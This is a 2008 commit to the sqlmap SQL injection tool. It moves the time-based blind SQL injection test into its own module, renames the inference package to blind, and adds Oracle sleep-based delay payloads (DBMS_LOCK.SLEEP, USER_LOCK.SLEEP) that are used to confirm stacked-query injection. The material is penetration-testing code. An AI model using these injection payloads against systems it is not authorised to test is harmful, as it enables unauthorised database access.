Properly moved and improved inject.goStacked() function and newly

bdamele · bdamele · commit ecc4a9807159 · 2008-11-12T23:44:09.000Z
implemented Time based blind SQL injection now is a single test file
within the lib/techniques/ folder.
Renamed lib/techniques/inference to lib/techniques/blind, it is more
approriate and adapted the rest of the libraries.
Updated ChangeLog file.
diff --git a/doc/ChangeLog b/doc/ChangeLog
@@ -2,10 +2,17 @@ sqlmap (0.6.3-1) stable; urgency=low
 
   * Minor enhancement to be able to specify the number of seconds to wait
     between each HTTP request;
+  * Minor enhancement to be able to enumerate table columns and dump table
+    entries also if the database name is not provided by using the current
+    database on MySQL and MSSQL, the 'public' scheme on PostgreSQL and the
+    'USERS' TABLESPACE_NAME on Oracle;
   * Minor improvements to sqlmap Debian package files: sqlmap uploaded
     to official Debian project repository;
   * Minor bug fix to handle session.error and session.timeout in HTTP
     requests;
+  * Minor bug fix so that when the user provide a SELECT statement to be
+    processed with an asterisk as columns, now it also work if in the FROM
+    there is no database name specified;
   * Minor bug fix to correctly dump table entries when the column is
     provided;
 
diff --git a/lib/controller/action.py b/lib/controller/action.py
@@ -31,6 +31,7 @@
 from lib.core.dump import dumper
 from lib.core.exception import sqlmapUnsupportedDBMSException
 from lib.core.settings import SUPPORTED_DBMS
+from lib.techniques.blind.timebased import timeTest
 from lib.techniques.inband.union.test import unionTest
 
 
@@ -70,7 +71,7 @@ def action():
 
     # Techniques options
     if conf.timeTest:
-        dumper.string("time based sql injection", conf.dbmsHandler.timeTest())
+        dumper.string("time based blind sql injection payload", timeTest())
 
     if conf.unionTest:
         dumper.string("valid union", unionTest())
diff --git a/lib/core/settings.py b/lib/core/settings.py
@@ -65,4 +65,4 @@
 
 SUPPORTED_DBMS    = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES
 
-TIME_SECONDS      = 5
+TIME_DELAY        = 5
diff --git a/lib/request/inject.py b/lib/request/inject.py
@@ -38,10 +38,10 @@
 from lib.core.data import logger
 from lib.core.data import queries
 from lib.core.data import temp
-from lib.core.settings import TIME_SECONDS
+from lib.core.settings import TIME_DELAY
 from lib.request.connect import Connect as Request
 from lib.techniques.inband.union.use import unionUse
-from lib.techniques.inference.blind import bisection
+from lib.techniques.blind.inference import bisection
 from lib.utils.resume import queryOutputLength
 from lib.utils.resume import resume
 
@@ -388,15 +388,16 @@ def goStacked(expression, timeTest=False):
     TODO: write description
     """
 
+    comment        = queries[kb.dbms].comment
     query          = agent.prefixQuery("; %s" % expression)
-    query          = agent.postfixQuery(query)
+    query          = agent.postfixQuery("%s; %s" % (query, comment))
     payload        = agent.payload(newValue=query)
 
     start    = time.time()
     Request.queryPage(payload)
     duration = int(time.time() - start)
 
     if timeTest:
-        return (duration >= TIME_SECONDS, payload)
+        return (duration >= TIME_DELAY, payload)
     else:
-        return duration >= TIME_SECONDS
+        return duration >= TIME_DELAY
diff --git a/lib/techniques/blind/__init__.py b/lib/techniques/blind/__init__.py
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
diff --git a/lib/techniques/blind/timebased.py b/lib/techniques/blind/timebased.py
@@ -0,0 +1,45 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+
+
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.data import queries
+from lib.core.settings import TIME_DELAY
+from lib.request import inject
+
+
+def timeTest():
+    infoMsg  = "testing time based blind sql injection on parameter "
+    infoMsg += "'%s'" % kb.injParameter
+    logger.info(infoMsg)
+
+    query    = queries[kb.dbms].timedelay % TIME_DELAY
+    timeTest = inject.goStacked(query, timeTest=True)
+
+    if timeTest[0] == True:
+        return timeTest[1]
+    else:
+        return None
diff --git a/lib/utils/resume.py b/lib/utils/resume.py
@@ -32,7 +32,7 @@
 from lib.core.data import logger
 from lib.core.data import queries
 from lib.core.unescaper import unescaper
-from lib.techniques.inference.blind import bisection
+from lib.techniques.blind.inference import bisection
 
 
 def queryOutputLength(expression, payload):
diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py
@@ -39,7 +39,6 @@
 from lib.core.exception import sqlmapNoneDataException
 from lib.core.exception import sqlmapUndefinedMethod
 from lib.core.exception import sqlmapUnsupportedFeatureException
-from lib.core.settings import TIME_SECONDS
 from lib.core.shell import autoCompletion
 from lib.core.unescaper import unescaper
 from lib.request import inject
@@ -69,27 +68,6 @@ def __init__(self, dbms):
         temp.inference              = queries[dbms].inference
 
 
-    # TODO: move this function to an appropriate file
-    def timeTest(self):
-        infoMsg  = "testing time based blind sql injection on parameter "
-        infoMsg += "'%s'" % kb.injParameter
-        logger.info(infoMsg)
-
-        # TODO: probably the '; <COMMENT>' will be filled in in all
-        # future time based SQL injection attacks at the end of the
-        # stacked query. Find a way that goStacked() function itself
-        # append it.
-        query  = "%s; " % queries[kb.dbms].timedelay % TIME_SECONDS
-        query += queries[kb.dbms].comment
-
-        self.timeTest = inject.goStacked(query, timeTest=True)
-
-        if self.timeTest[0] == True:
-            return "True, verified with payload: %s" % self.timeTest[1]
-        else:
-            return "False"
-
-
     def forceDbmsEnum(self):
         pass
 
diff --git a/xml/queries.xml b/xml/queries.xml
@@ -72,7 +72,7 @@
         <order query="ORDER BY %s ASC"/>
         <count query="COUNT(%s)"/>
         <comment query="--"/>
-        <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="SELECT UTL_INADDR.get_host_name('10.0.0.%d') FROM DUAL"/>
+        <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d00)"/>
         <substring query="SUBSTR((%s), %d, %d)"/>
         <inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
         <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>

Original file line number	Diff line number	Diff line change
`@@ -65,4 +65,4 @@`
`65`	`65`
`66`	`66`	`SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES`
`67`	`67`
`68`		`-TIME_SECONDS = 5`
	`68`	`+TIME_DELAY = 5`